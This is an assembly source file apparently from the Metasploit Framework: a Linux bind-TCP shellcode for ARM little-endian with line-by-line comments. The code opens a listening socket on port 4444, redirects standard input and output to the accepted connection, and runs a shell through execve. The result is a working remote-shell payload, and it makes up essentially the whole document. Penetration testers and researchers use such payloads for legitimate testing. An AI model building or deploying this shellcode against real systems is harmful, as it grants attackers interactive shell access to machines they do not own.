GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/linux/armle/single_sock_bind.s
@@
@
@ Name: single_sock_bind
@ Qualities: -
@ Authors: civ, repmovsb
@ License: MSF_LICENSE
@ Description:
@
@ Implementation of a Linux bind TCP shellcode for ARM LE architecture.
@
@ This source is built from the payload module (instead of other way around...)
@
@ Assemble with: as single_sock_bind.s -o single_sock_bind.o
@ Link with: ld single_sock_bind.o -o single_sock_bind
@
@ Layout note: the sockaddr, SHELL and ARGV0 words at the end of .text are
@ located by PC-relative adds (#128, #36, #36) that assume the exact number
@ of instructions and data words between them.  In ARM state pc reads as the
@ address of the current instruction + 8.  Inserting or removing any
@ instruction or word invalidates those offsets.
@
@ Register roles:
@   r6 = socket fd: the listening socket, then the accepted connection
@   r7 = syscall number (ARM EABI convention: number in r7, "svc 0")
@   Syscall numbers >= 256 are built as (1 << 8) + n because they cannot
@   be expressed as a single ARM rotated 8-bit immediate.
@
@ Meta-Information:
@
@ meta-shortname=Linux Bind TCP
@ meta-description=Listen on a port for a connection and run a second stage
@ meta-authors=civ, repmovsb
@ meta-os=linux
@ meta-arch=armle
@ meta-category=singles
@ meta-connection-type=bind
@ meta-name=bind_tcp
@@

.text
.globl _start
_start:
@ int socket(int domain, int type, int protocol);
@ socket(2,1,6)  ->  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
mov r0, #2
mov r1, #1
mov r2, #6
mov r7, #1
lsl r7, r7, #8                  @ r7 = 256
add r7, r7, #25                 @ r7 = 281 = __NR_socket (ARM EABI)
svc 0
mov r6, r0                      @ r6 = listening socket fd; r0 is left untouched for bind()

@ bind(r0 = fd returned by socket(), r1 = &sockaddr_in, r2 = 16)
@ r0 is not reloaded here: it still holds the return value of socket().
add r1, pc, #128                @ r1 = &addr words below: pc + 8 + 128 = 34 instructions ahead
mov r2, #16                     @ sizeof(struct sockaddr_in)
mov r7, #1
lsl r7, r7, #8
add r7, r7, #26                 @ r7 = 282 = __NR_bind
svc 0

@ listen(r0 = r6, r1 = backlog)
@ NOTE: r1 is not set here; it still holds the sockaddr pointer left by the
@ bind() call above, so that address value is passed as the backlog
@ (presumably clamped by the kernel to its maximum - confirm if it matters).
mov r0, r6
mov r7, #1
lsl r7, r7, #8
add r7, r7, #28                 @ r7 = 284 = __NR_listen
svc 0

@ accept(r0 = r6, r1 = NULL, r2 = NULL): peer address is not requested
mov r0, r6
sub r1, r1, r1                  @ r1 = 0 (addr = NULL)
sub r2, r2, r2                  @ r2 = 0 (addrlen = NULL)
mov r7, #1
lsl r7, r7, #8
add r7, r7, #29                 @ r7 = 285 = __NR_accept
svc 0

@ dup2(r0 = connection fd, r1) for r1 = 2, 1, 0:
@ stderr, stdout and stdin are redirected onto the accepted connection.
mov r6, r0                      @ r6 = accepted connection fd (listening fd is no longer referenced)
mov r1, #2
loop:
mov r0, r6                      @ reload r0 each pass: svc overwrites it with dup2()'s return value
mov r7, #63                     @ r7 = 63 = __NR_dup2
svc 0
subs r1, r1, #1                 @ r1 = 2, 1, 0 across the three passes
bpl loop                        @ loop while r1 >= 0; falls through after the r1 == 0 pass

@ execve(SHELL, [ARGV0, NULL], [NULL])
add r0, pc, #36                 @ r0 = &SHELL: pc + 8 + 36 = 11 words ahead
eor r4, r4, r4                  @ r4 = 0
push {r4}                       @ push NULL: terminator shared by envp and argv
mov r2, sp                      @ r2 = envp = { NULL }
add r4, pc, #36                 @ r4 = &ARGV0: 11 words ahead of this instruction
push {r4}                       @ argv[0] = &ARGV0, with the NULL pushed above as argv[1]
mov r1, sp                      @ r1 = argv = { &ARGV0, NULL }
mov r7, #11                     @ r7 = 11 = __NR_execve
svc 0                           @ does not return on success; if it fails, execution
                                @ runs on into the data words below (no error handling)

@ addr: struct sockaddr_in as seen by bind() above (little-endian bytes 02 00 11 5c)
@ port: 4444 (0x115c in network byte order), sin_fam = 2 (AF_INET)
.word 0x5c110002
@ ip: 0.0.0.0 (INADDR_ANY)
.word 0x00000000
@ Only 8 of the 16 bytes passed to bind() are defined here; the sin_zero
@ padding overlaps the first two SHELL words that follow.

@ SHELL: 16 zero bytes, presumably overwritten with the NUL-terminated shell
@ path by the payload module that builds this source (see header).
.word 0x00000000 @ the shell goes here!
.word 0x00000000
.word 0x00000000
.word 0x00000000
@ ARGV0: 16 zero bytes, presumably overwritten with argv[0] the same way.
.word 0x00000000 @ the args!
.word 0x00000000
.word 0x00000000
.word 0x00000000